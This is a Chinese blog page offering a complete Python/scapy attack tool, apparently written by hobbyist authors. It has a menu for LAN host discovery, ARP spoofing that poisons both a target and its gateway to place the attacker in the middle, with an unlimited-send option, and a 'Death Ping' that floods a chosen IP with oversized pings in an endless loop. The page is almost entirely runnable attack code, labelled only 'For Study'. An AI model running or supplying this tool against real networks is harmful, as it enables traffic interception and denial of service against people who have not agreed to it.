• 如何用Python进行ARP攻击?


    #!/usr/bin/python3
    from scapy.all import *
    import threading
    import socket
    import uuid
    import time
    import os
    
    ###################
    # Date of preparation : 2021/05/10 19:38
    # Authors : PigCloud & HackPig
    # Usage : Run it and follow the guide ! 
    # Operation platform : Windows [7/10] Linux (and more...)
    # E-mail : 3356136957#qq.com (# --> @)
    ###################
    # Debug advice : 
    #  1.永远跟着注释走
    #  2.可自行创新
    ###################
    intro = ''' 
                ┌─────────────────────────────────────────────
                │                   Main Menu             Python3 version 3.9
                ├─────────────────────────────────────────────
                │           Tips : Only For Study
                │              Usage :
                │        [h] Host scan
                │        [o] Host spoofing
                │        [p] Death Ping
                │               Enjoy it !
                ├─────────────────────────────────────────────
                │   Authors : 
                │       PigCloud 
                │       HackPig 3356136957
                │       
                │   Link : https://www.cnblogs.com/xiaozhu2020/p/python-arp.html
                └─────────────────────────────────────────────
    '''
    
    
    def ping(attackIP):
        count = 1
        while True:
            cmd = "ping %s -l 65500" % attackIP
            print(cmd)
            result = os.system(cmd)
            print(result)
            print("Sent", count)
            count += 1
    
    
    def gateway_mac_1(gateway_ip):
        try:
            gateway_mac_2 = getmacbyip(gateway_ip)
            return gateway_mac_2
        except():
            print('[-]请检查网关MAC是否存活')
    
    
    def get_mac(Target_IP):
        try:
            tgtMac = getmacbyip(Target_IP)
            return tgtMac
        except():
            print('[-]请检查目标IP是否存活')
    
    
    def get_mac_address():
        mac = uuid.UUID(int=uuid.getnode()).hex[-12:]
        return ":".join([mac[e:e + 2] for e in range(0, 11, 2)])
    
    
    def host_discovery(host_computer):
        IpScan = host_computer + '/24'
        try:
            ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=IpScan), timeout=2)
        except Exception as opp:
            print(opp)
        else:
            print("[%d] LAN survived" % (len(ans)))
            print("  MAC address               IP address")
            print("                                      ")
            for send, rcv in ans:
                ListMACAddr = rcv.sprintf("%Ether.src% ----------- %ARP.psrc%")
                print(ListMACAddr)
    
    
    def host_arp_spoofing(native_mac, target_mac, gateway_ip, Target_ip):
        data_packet = Ether(src=native_mac, dst=target_mac) / ARP(hwsrc=native_mac, psrc=gateway_ip, hwdst=target_mac,
                                                                  pdst=Target_ip, op=2)
        return data_packet
    
    
    def gateway_arp_spoofing(native_mac, gateway_mac, gateway_ip, Target_ip):
        data_packet = Ether(src=native_mac, dst=gateway_mac) / ARP(hwsrc=native_mac, psrc=Target_ip, hwdst=gateway_mac,
                                                                   pdst=gateway_ip, op=2)
        return data_packet
    
    
    def main():
        print(intro)
        print("33[1;32mSelect mode!33[0m") #选择模式
        pattern = input('33[1;31m[*]33[0m==>')
        if pattern == 'h':
            print('Please enter local v4ip') #输入本机IP
            host_computer = input("33[1;31m[*]33[0m==>")
            wait_a_moment = input("33[1;31m[.....]33[0m press any key to continue")
            host_discovery(host_computer)
    
        if pattern == 'o':
            try:
                native_mac = get_mac_address()  # 本机Mac地址
                print("Enter the ip address of the target")  # 目标IP地址
                Target_ip = input("33[1;31m[*]33[0m==>")
                target_mac = get_mac(Target_ip)  # IP转Mac地址
                print("Enter the IP address of the gateway")  # 网关IP地址
                gateway_ip = input("33[1;31m[*]33[0m==>")
                gateway_mac = gateway_mac_1(gateway_ip)  # 网关Mac地址
                print("The local MAC address is:", native_mac)
                print("The MAC address of the target computer is:", target_mac)
                print("The gateway IP address is:", gateway_ip)
                print("The gateway MAC address is:", gateway_mac)
            except():
                print("33[1;31m[!]33[0mPlease enter the correct parameters")
            try:
                print("Number of ARP attacks launched")
                frequency = input("Unlimited attack [y/n] default=[n]") #无限制攻击?
                implement = host_arp_spoofing(native_mac, target_mac, gateway_ip, Target_ip)
                gateway = gateway_arp_spoofing(native_mac, gateway_mac, gateway_ip, Target_ip)
                if frequency == 'y':
                    wait_a_moment_1 = input("33[1;31m[.....]33[0m press any key to continue")
                    count = 1
                    while True:
                        thread = threading.Thread(target=sendp, args=(implement,))
                        thread.start()
                        thread.join()
                        print("33[1;36mSend [%d] computer ARP Spoofing packet33[0m" % count)
                        thread_q = threading.Thread(target=sendp, args=(gateway,))
                        thread_q.start()
                        thread.join()
                        print("Send [%d] gateway ARP Spoofing packet" % count)
                        count += 1
                count_1 = 1
                if frequency == 'n':
                    wait_a_moment_2 = input("33[1;31m[.....]33[0m press any key to continue")
                    Setting_times = input("33[1;31m[+]33[0mEnter the number of cycles==>") # 输入循环数
                    for loop in range(int(Setting_times)):
                        thread = threading.Thread(target=sendp, args=(implement,))
                        thread.start()
                        thread.join()
                        print("33[1;36mSend [%d] computer ARP Spoofing packet33[0m" % count_1)
                        thread_q = threading.Thread(target=sendp, args=(gateway,))
                        thread_q.start()
                        thread.join()
                        print("Send [%d] gateway ARP Spoofing packet" % count_1)
                        count_1 += 1
            except():
                print('33[1;31m[!]33[0mPlease select the correct mode')
        if pattern == 'p':
            attackIP = input("33[1;31m[*]33[0Attack IP address===>")
            wait_a_moment_2 = input("33[1;31m[.....]33[0m Please press any key to continue")
            ping(attackIP)
    
    
    if __name__ == '__main__':
        main() # Coded By PigCloud & HackPig
    
  • 相关阅读:
    UITabar 设置字体大小/颜色
    NSURLSession的基本使用
    报错/警告提示
    实现毛玻璃模糊效果/DRNRealTimeBlur
    免证书真机调试
    xcode添加音效
    NSCalenda日历类
    NSDate--日期格式
    NSArray其中的方法--遍历,
    Mysql学习笔记004
  • 原文地址:https://www.cnblogs.com/xiaozhu2020/p/python-arp.html
Copyright © 2020-2023  润新知